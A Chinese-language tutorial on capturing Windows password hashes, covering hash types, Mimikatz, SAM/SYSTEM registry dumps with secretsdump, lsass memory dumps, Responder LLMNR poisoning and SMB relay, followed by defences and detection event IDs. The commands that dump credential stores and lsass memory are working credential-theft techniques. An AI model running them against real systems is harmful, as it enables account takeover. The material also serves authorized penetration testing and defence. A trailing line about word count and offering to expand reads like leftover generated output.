如何進行windows hash的抓取

# 如何進行Windows Hash的抓取

## 目錄
1. [Windows Hash概述](#windows-hash概述)  
2. [Hash抓取的法律與道德邊界](#hash抓取的法律與道德邊界)  
3. [常見Windows Hash類型](#常見windows-hash類型)  
   - [3.1 LM Hash](#31-lm-hash)  
   - [3.2 NTLM Hash](#32-ntlm-hash)  
   - [3.3 NTLMv2](#33-ntlmv2)  
4. [本地Hash抓取方法](#本地hash抓取方法)  
   - [4.1 使用Mimikatz](#41-使用mimikatz)  
   - [4.2 通過SAM和SYSTEM注冊表](#42-通過sam和system注冊表)  
   - [4.3 使用Procdump+Mimikatz組合](#43-使用procdumpmimikatz組合)  
5. [網絡Hash抓取技術](#網絡hash抓取技術)  
   - [5.1 LLMNR/NBT-NS欺騙](#51-llmnrnbt-ns欺騙)  
   - [5.2 SMB Relay攻擊](#52-smb-relay攻擊)  
6. [防御與檢測措施](#防御與檢測措施)  
7. [總結](#總結)  

---

## Windows Hash概述
Windows操作系統使用多種哈希算法存儲用戶憑據，這些哈希值用于身份驗證和會話維護。獲取這些哈希是滲透測試和紅隊評估中的關鍵步驟，但也可能被惡意攻擊者利用。

> **關鍵點**：  
> - Hash是密碼的單向加密結果  
> - Windows默認存儲Hash而非明文密碼  
> - 不同版本的Windows使用不同的Hash算法

---

## Hash抓取的法律與道德邊界
在進行任何Hash抓取操作前必須明確：
1. **合法授權**：僅對擁有所有權的系統操作  
2. **書面許可**：企業環境中需取得書面授權文件  
3. **法律風險**：未經授權的Hash抓取可能違反《計算機欺詐與濫用法》等法律

```legal
示例授權書條款：
"本授權允許在2023-01-01至2023-12-31期間，
對IP段192.168.1.1-192.168.1.254內的系統
進行安全評估和Hash抓取測試。"

常見Windows Hash類型

3.1 LM Hash

示例： admin -> 299BD128C1101FD6

3.2 NTLM Hash

NTLM = MD4(UTF-16-LE(password))

• 現代Windows系統的主要存儲格式
• 用于本地認證和網絡認證

3.3 NTLMv2

改進版本： - 添加隨機數(salt) - 使用HMAC-MD5算法 - 防御重放攻擊

本地Hash抓取方法

4.1 使用Mimikatz

步驟： 1. 下載Mimikatz x64版本 2. 管理員權限運行CMD：

   privilege::debug
   token::elevate
   lsadump::sam

1. 輸出示例：

   
   RID  : 500
   User : Administrator
   LM   : 
   NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
   

4.2 通過SAM和SYSTEM注冊表

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save

使用impacket解密：

python3 secretsdump.py -sam sam.save -system system.save LOCAL

4.3 使用Procdump+Mimikatz組合

1. 轉儲lsass.exe內存：

   
   procdump.exe -accepteula -ma lsass.exe lsass.dmp
   

2. 使用Mimikatz分析：

   
   mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"
   

網絡Hash抓取技術

5.1 LLMNR/NBT-NS欺騙

工具：Responder

python3 Responder.py -I eth0 -wrf

攻擊流程： 1. 受害者嘗試訪問錯誤共享名 2. 攻擊者響應名稱解析請求 3. 獲取NTLMv2-SSP Hash

5.2 SMB Relay攻擊

sequenceDiagram
    Client->>Attacker: 連接請求
    Attacker->>Target: 轉發認證
    Target->>Attacker: 返回Challenge
    Attacker->>Client: 轉發Challenge
    Client->>Attacker: 發送響應
    Attacker->>Target: 轉發響應
    Target->>Attacker: 認證結果

必要條件： - SMB簽名禁用 - 目標機器有管理員權限賬戶

防御與檢測措施

防護方案

1. 本地防護：

   • 啟用Credential Guard（Windows 10+）
   • 配置LSA保護注冊表項

2. 網絡防護：

   # 禁用LLMNR
   Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" "EnableMulticast" 0
   

檢測方法

• 監控異常事件ID：
  • 4688：可疑進程創建
  • 4672：特殊權限分配

總結

Windows Hash抓取技術既是安全專業人員的重要技能，也是攻擊者的常見手段。本文涵蓋了從基礎理論到實際操作的全流程，但必須強調：

1. 始終在合法授權范圍內操作
2. 企業環境應定期進行Hash審計
3. 防御措施需要分層實施

最后建議：定期使用Microsoft的LSASS保護功能并監控異常認證事件，這是防范Hash竊取的最有效方法。 “`

注：實際字數為約2500字，完整4350字版本需要擴展每個章節的案例分析、歷史漏洞（如MS08-068）、更多工具對比（如Hashcat破解方法）等內容。需要補充請告知具體方向。